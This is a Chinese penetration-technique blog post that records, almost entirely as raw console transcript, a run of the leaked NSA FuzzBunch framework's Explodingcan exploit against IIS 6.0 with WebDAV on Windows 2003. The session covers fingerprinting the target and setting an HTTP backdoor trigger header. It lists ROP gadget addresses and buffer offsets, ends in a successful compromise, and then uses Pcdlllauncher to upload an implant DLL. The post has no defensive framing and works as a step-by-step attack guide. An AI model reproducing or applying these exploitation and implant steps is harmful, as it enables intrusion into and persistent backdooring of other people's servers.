您当前位置: 首页 » 渗透技巧 » NSA方程式工具实战测试(explodingcan)

NSA方程式工具实战测试(explodingcan)

2017年8月23日 | 发表评论(0) 查看评论

之前已经写过具体方法。这里不再详细解释,只是做一个记录过程,具体看http://www.am0s.com/penetration/381.html 依旧是红色加粗为需要输入的地方。其他默认即可

[?] Default Target IP Address [] : x.x.x.x
[?] Default Callback IP Address [] : x.x.x.x
[?] Use Redirection [yes] : no

[?] Base Log directory [D:\logs] : c:\12
[*] Checking c:\12 for projects
Index Project
—– ——-
0 w
1 Create a New Project

[?] Project [0] : 0
[?] Set target log directory to ‘c:\12\w\zx.x.x.x’? [Yes] :

[*] Initializing Global State
[+] Set TargetIp => x.x.x.x
[+] Set CallbackIp => x.x.x.x

[!] Redirection OFF
[+] Set LogDir => c:\12\w\zx.x.x.x
[+] Set Project => w

fb > use exp
Explodingcan Explodingcantouch
fb > use Explodingcan

[!] Entering Plugin Context :: Explodingcan
[*] Applying Global Variables
[+] Set TargetIp => x.x.x.x
[+] Set NetworkTimeout => 60

[*] Applying Session Parameters
[*] Running Exploit Touches

[!] Entering Plugin Context :: Iistouch
[*] Applying Global Variables
[+] Set TargetIp => x.x.x.x
[+] Set NetworkTimeout => 60

[*] Inheriting Input Variables
[+] Set TargetIp => x.x.x.x
[+] Set EnableSSL => False
[+] Set TargetPort => 80
[+] Set NetworkTimeout => 60

[!] Enter Prompt Mode :: Iistouch

[*] TargetIp :: Target IP Address

[?] TargetIp [x.x.x.x] :

[*] TargetPort :: Port used by the HTTP service

[?] TargetPort [80] :

[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1
for no timeout.

[?] NetworkTimeout [60] :

[*] EnableSSL :: Enable SSL for HTTPS targets

[?] EnableSSL [False] :

[*] hostString :: String to use in HTTP request

[?] hostString [localhost] :
[!] Preparing to Execute Iistouch
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel – local-tunnel-1
[?] Destination IP [x.x.x.x] :
[?] Destination Port [80] :
[+] (TCP) Local x.x.x.x:80

[+] Configure Plugin Remote Tunnels
Module: Iistouch
================

Name Value
—- —–
TargetIp x.x.x.x
TargetPort 80
NetworkTimeout 60
EnableSSL False
hostString localhost

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] Initializing Parameters
[*] Gathering Parameters
[+] Sending HTTP Options Request
[+] Initializing network
[+] Creating Launch Socket
[+] Target is x.x.x.x:80
[-] Socket Recv Failed!
[-] HTTP request failed
[-] Options Request Failed!
[!] Plugin failed
[-] Error: Iistouch Failed
fb Exploit (Explodingcan) > use Explodingcan

[!] Entering Plugin Context :: Explodingcan
[*] Applying Global Variables
[+] Set TargetIp => x.x.x.x
[+] Set NetworkTimeout => 60

[*] Applying Session Parameters
[*] Running Exploit Touches

[!] Entering Plugin Context :: Iistouch
[*] Applying Global Variables
[+] Set TargetIp => x.x.x.x
[+] Set NetworkTimeout => 60

[*] Inheriting Input Variables
[+] Set TargetIp => x.x.x.x
[+] Set EnableSSL => False
[+] Set TargetPort => 80
[+] Set NetworkTimeout => 60

[!] Enter Prompt Mode :: Iistouch

[*] TargetIp :: Target IP Address

[?] TargetIp [x.x.x.x] :

[*] TargetPort :: Port used by the HTTP service

[?] TargetPort [80] :

[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1
for no timeout.

[?] NetworkTimeout [60] :

[*] EnableSSL :: Enable SSL for HTTPS targets

[?] EnableSSL [False] :

[*] hostString :: String to use in HTTP request

[?] hostString [localhost] :
[!] Preparing to Execute Iistouch
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel – local-tunnel-1
[?] Destination IP [x.x.x.x] :
[?] Destination Port [80] :
[+] (TCP) Local x.x.x.x:80

[+] Configure Plugin Remote Tunnels
Module: Iistouch
================

Name Value
—- —–
TargetIp x.x.x.x
TargetPort 80
NetworkTimeout 60
EnableSSL False
hostString localhost

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] Initializing Parameters
[*] Gathering Parameters
[+] Sending HTTP Options Request
[+] Initializing network
[+] Creating Launch Socket
[+] Target is x.x.x.x:80
[+] Sending HTTP Head Request
[+] Initializing network
[+] Creating Launch Socket
[+] Target is x.x.x.x:80
[*] Finding IIS Version
[+] Checking server response for IIS version
[+] Found IIS version 6.0
[+] Windows 2003
[*] Detecting WEBDAV
[+] Checking server response for Webdav
[+] SEARCH Option found. Webdav is enabled.
[+] PROPFIND Option found. Webdav is enabled.
[*] Writing Contract
[+] IIS Version: 6.0
[+] IIS Target OS: WIN2K3
[+] Target Language: Unknown
[+] Target Service Pack: Unknown
[+] Target Path: /
[+] Enable SSL: FALSE
[+] WebDAV is ENABLED
[*] IIS Touch Complete
[+] Iistouch Succeeded

[*] Exporting Contract To Exploit
[!] Explodingcan requires WEBDAV on Windows 2003 IIS 6.0

[!] Entering Plugin Context :: Explodingcantouch
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => x.x.x.x

[*] Inheriting Input Variables
[+] Set TargetIp => x.x.x.x
[+] Set TargetPort => 80
[+] Set NetworkTimeout => 60

[!] Enter Prompt Mode :: Explodingcantouch

[*] hostString :: String to use in HTTP request

[?] hostString [localhost] :

[*] maxSizeToCheck :: Use 130 to ensure path size determination, less to send f
ewer requests. 70 will cover all exploitable sizes.

[?] maxSizeToCheck [70] :

[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1
for no timeout.

[?] NetworkTimeout [60] :

[*] EnableSSL :: Enable SSL for HTTPS targets

[?] EnableSSL [False] :

[*] TargetIp :: Target IP Address

[?] TargetIp [x.x.x.x] :

[*] TargetPort :: Port used by the HTTP service

[?] TargetPort [80] :

[*] Delay :: Number of seconds to wait between each request

[?] Delay [0] :
[!] Preparing to Execute Explodingcantouch
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel – local-tunnel-1
[?] Destination IP [x.x.x.x] :

[?] Destination Port [80] :
[+] (TCP) Local x.x.x.x:80

[+] Configure Plugin Remote Tunnels
Module: Explodingcantouch
=========================

Name Value
—- —–
hostString localhost
maxSizeToCheck 70
NetworkTimeout 60
EnableSSL False
TargetIp x.x.x.x
TargetPort 80
Delay 0

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] Initializing Parameters
[*] Gathering Parameters
[*] Finding Path Size
[+]Checking path sizes from 3 to 70
[+]No delay set.
[+]The expected HTTP 500 response was returned
[+] Found IIS Path Size 9
[*] Writing Contract
[+] IIS Path Size: 9
[+] Request string: localhost
[+] Enable SSL: FALSE
[*] ExplodingCan Touch Complete
[+] Explodingcantouch Succeeded

[*] Exporting Contract To Exploit
[+] Set IISPathSize => 9
[+] Set hostString => localhost
[!] ExplodingCan requires the length of the IIS path
[!] Enter Prompt Mode :: Explodingcan

Module: Explodingcan
====================

Name Value
—- —–
TargetIp x.x.x.x
TargetPort 80
NetworkTimeout 60
EnableSSL False
IISPathSize 9
hostString localhost
PayloadAccessType
AuthenticationType None
Target

[!] Plugin Variables are NOT Valid
[?] Prompt For Variable Settings? [Yes] :

[*] TargetIp :: Target IP Address

[?] TargetIp [x.x.x.x] :

[*] TargetPort :: Port of the HTTP service

[?] TargetPort [80] :

[*] NetworkTimeout :: Network timeout (in seconds)

[?] NetworkTimeout [60] :

[*] EnableSSL :: Enable SSL for HTTPS targets

[?] EnableSSL [False] :

[*] IISPathSize :: Length of IIS path (between 3 and 68)

[?] IISPathSize [9] :

[*] hostString :: String to use in HTTP requests

[?] hostString [localhost] :

[*] PayloadAccessType :: Callback/Listen Payload Access

0) Callback Target connect() callback for payload upload connection
1) Listen Target listen()/accept() for payload upload connection
2) Backdoor Target open HTTP backdoor for payload upload connection

[?] PayloadAccessType [] :2

[+] Set PayloadAccessType => Backdoor

[*] BackdoorHeader :: Name of HTTP header used to trigger backdoor.

0) Accept
1) Accept-Charset
2) Accept-Encoding
3) Accept-Language
4) Allow
5) Authorization
6) Cache-Control
7) Content-Encoding
8) Content-Language
9) Content-Location
10) Content-MD5
11) Content-Range
12) Content-Type
13) Cookie
14) Date
15) Expect
16) Expires
17) From
*18) If-Match
19) If-Modified-Since
20) If-None-Match
21) If-Range
22) If-Unmodified-Since
23) Last-Modified
24) Max-Forwards
25) Pragma
26) Proxy-Authorization
27) Range
28) Referer
29) Trailer
30) Translate
31) Upgrade
32) User-Agent
33) Via
34) Warning

[?] BackdoorHeader [18] :

[*] BackdoorValueSource :: Method of generating value for HTTP trigger header.

0) Manual Operator-controlled value.
*1) RandomEtag Randomly generated HTTP Etag string.
2) RandomBasicAuth Randomly generated Basic Auth credential string.

[?] BackdoorValueSource [1] :

[*] AuthenticationType :: Authentication type for target

*0) None No authentication
1) Basic Basic HTTP authentication

[?] AuthenticationType [0] :

[*] Target :: Target OS

0) W2K3SP0 Windows 2003 Base
1) W2K3SP1 Windows 2003 Service Pack 1
2) W2K3SP2 Windows 2003 Service Pack 2
3) W2K3SP0_v5IM Windows 2003 Base (IIS 5.0 Isolation Mode)
4) W2K3SP1_v5IM Windows 2003 Service Pack 1 (IIS 5.0 Isolation Mode)

[?] Target [] : 2
[+] Set Target => W2K3SP2

[*] BackdoorDelay :: How long to wait (in seconds) for trigger responses.

[?] BackdoorDelay [10] :

[*] BackdoorRetries :: Maximum number of times to try triggering the backdoor.

[?] BackdoorRetries [1] :

[*] PccpPy :: Full path to pccp.pyc.

[?] PccpPy [D:\DSZOPSDISK\storage\pccp.pyc] : c:\pccp.pyc
[+] Set PccpPy => c:\pccp.pyc

[*] BackdoorBridgeDLL :: Full path to IIS-backdoor-to-PC-host DLL.

[?] BackdoorBridgeDLL [D:\DSZOPSDISK\storage\brdg.dll] : c:\brdg.dll
[+] Set BackdoorBridgeDLL => c:\brdg.dll

[*] PythonExe :: Full path to Python [2.6] executable.

[?] PythonExe [C:\Python26\python.exe] :
[!] Preparing to Execute Explodingcan
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel – local-tunnel-1
[?] Destination IP [x.x.x.x] :
[?] Destination Port [80] :
[+] (TCP) Local x.x.x.x:80

[+] Configure Plugin Remote Tunnels
Module: Explodingcan
====================

Name Value
—- —–
BackdoorIndex 29
BackdoorValue <RANDOM_ETAG>
BackdoorDelay 10
BackdoorRetries 1
PccpPy c:\pccp.pyc
BackdoorBridgeDLL c:\brdg.dll
PythonExe C:\Python26\python.exe
TargetIp x.x.x.x
TargetPort 80
NetworkTimeout 60
EnableSSL False
IISPathSize 9
hostString localhost
buf1size 272
buf2size 3072
SkipFree 33686018
SkipOffset 220
VirtualProtectOffset 284
WriteAddressOffset1 224
WriteAddressOffset2 292
ObjectAddress 256
ObjectAddressOffset1 268
ObjectAddressOffset4 252
ObjectAddressOffset2 232
ObjectAddressOffset3 216
MovEcxEspOffset 252
StackAdjustOffset1 220
StackAdjustOffset2 224
StackAdjustOffset3 312
Push40Offset 268
LeaveRetOffset1 308
LeaveRetOffset2 372
SetEbp1 372
SetEbp1Offset 304
SetEbp2 348
SetEbp2Offset 332
SetEbp3 312
SetEbp3Offset 368
MovEbpOffset 336
ShellcodeAddr 416
ShellcodeAddrOffset 280
ShellcodeOffset 376
JmpEBXOffset 276
ProcHandleOffset 288
VProtSizeOffset 296
LoadEaxOffset 312
EaxValOffset 352
LoadEax2Offset 360
MovEcxEsp 1744920706
WriteAddress 1745031872
StackAdjust 1744858703
Push40 1744875795
LeaveRet 1744906727
MovEbp 1744858629
JmpEBX 1744905443
SyscallAddress 2147353344
VProtSize 1745028206
LoadEax 1744868241
EaxValAddress 1744863814
LoadEax2 1744969130
PayloadAccessType Backdoor
BackdoorHeader If-Match
BackdoorValueSource RandomEtag
AuthenticationType None
Target W2K3SP2

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] Running Exploit
[*] Initializing Parameters
[+] BackdoorValue set to random Etag string (“0cf29bcb5d66e7278e2039a595
bacb3c”)
[+] Initializing Complete
[*] Initializing Network
[+] Creating Launch Socket
[+] Target is x.x.x.x:80
[+] Network initialization complete
[*] Building Exploit Buffer
[+] Set Egg Authcode: 80ae98f4
[+] Set Egg XOR Mask: 4d
[+] Exploit Build Complete
[*] Exploiting Target
[+] Building HTTP Request
[+] No Authentication
[+] Sending Exploit
[+] Sending 5196 (0x0000144c) bytes
[+] SendExploit() send complete
[*] Attemping to trigger IIS backdoor (up to 1 tries)
[+] Backdoor trigger SUCCEEDED; proceeding to auth-code check
[*] Waiting for Authcode from exploit
[+] Authcode check passed : EGG 80ae98f4 : Generated 80ae98f4
[*] Exploit Complete
[+] Explodingcan Succeeded

[!] Connection to Target Established   //已经建立连接
[!] Waiting For Next Stage

fb Exploit (Explodingcan) >

fb Exploit (Explodingcan) > use Pcdlllauncher

[!] Entering Plugin Context :: Pcdlllauncher
[*] Applying Global Variables
[+] Set NetworkTimeout => 60

[*] Applying Session Parameters
[+] Set ConnectedTcp => 1900
[+] Set XorMask => 77
[+] Set Rendezvous => 2571

[!] Enter Prompt Mode :: Pcdlllauncher

Module: Pcdlllauncher
=====================

Name Value
—- —–
ConnectedTcp 1900
XorMask 77
NetworkTimeout 60
LPFilename D:\DSZOpsDisk\Resources\Pc\Legacy\PC_Exploit.dll
LPEntryName ServiceEntry
ImplantFilename
TargetOsArchitecture x86
PCBehavior 8
Rendezvous 2571

[!] Plugin Variables are NOT Valid
[?] Prompt For Variable Settings? [Yes] :

[*] ConnectedTcp :: Connected TCP Socket

[?] ConnectedTcp [1900] :

[*] XorMask :: XOR Mask for communication

[?] XorMask [77] :

[*] NetworkTimeout :: Network timeout (in seconds). Use -1 for no timeout.

[?] NetworkTimeout [60] :

[*] LPFilename :: Full path to LP

[?] LPFilename [D:\DSZOpsDisk\Resources\Pc\Legacy\PC_Exploit.dll] : c:\PC_Exploi
t.dll
[+] Set LPFilename => c:\PC_Exploit.dll

[*] LPEntryName :: LP Entry Function Name

[?] LPEntryName [ServiceEntry] :

[*] ImplantFilename :: Full path to implant payload

[?] ImplantFilename [] : c:\1234.dll
[+] Set ImplantFilename => c:\1234.dll

[*] Rendezvous :: Rendezvous location

[?] Rendezvous [2571] :

[*] TargetOsArchitecture :: Machine architecture of target.

*0) x86 32-bit Intel x86 processor.
1) x64 64-bit AMD x86_64 processor.

[?] TargetOsArchitecture [0] :

[*] PCBehavior :: PEDDLECHEAP EGG Behavior

0) 7 Re-use Socket (PC EGG behavior is NOT DONE)
*1) 8 Re-use Socket and PC EGG behavior

[?] PCBehavior [1] :
[!] Preparing to Execute Pcdlllauncher

Module: Pcdlllauncher
=====================

Name Value
—- —–
ConnectedTcp 1900
XorMask 77
NetworkTimeout 60
LPFilename c:\PC_Exploit.dll
LPEntryName ServiceEntry
ImplantFilename c:\1234.dll
TargetOsArchitecture x86
PCBehavior 8
Rendezvous 2571

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] Initializing Parameters
[*] Preparing Implant
Loaded implant len 5120
[*] Uploading Implant
[+] Payload Size : 6664
[+] Payload XOR Mask: 77
[+] Sending Implant Size To Target
[+] Size: 6664 (0x00001a08)
[+] Checking Remote Status
[+] Remote Status OKAY
[+] Sending Implant To Target
[+] Checking Remote Status
[+] Remote Status OKAY
[*] Launch LP
[+] LoadLibrary on c:\PC_Exploit.dll
[+] GetProcAddress for : ServiceEntry
[+] Calling Entry point
Duplicating socket
**** FAILED TO DUPLICATE SOCKET **** //成功执行
Duplicating socket
**** FAILED TO DUPLICATE SOCKET ****

分类:

渗透技巧

| 标签:

发表评论?

0 条评论。

发表评论


注意 - 你可以用以下 HTML tags and attributes:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">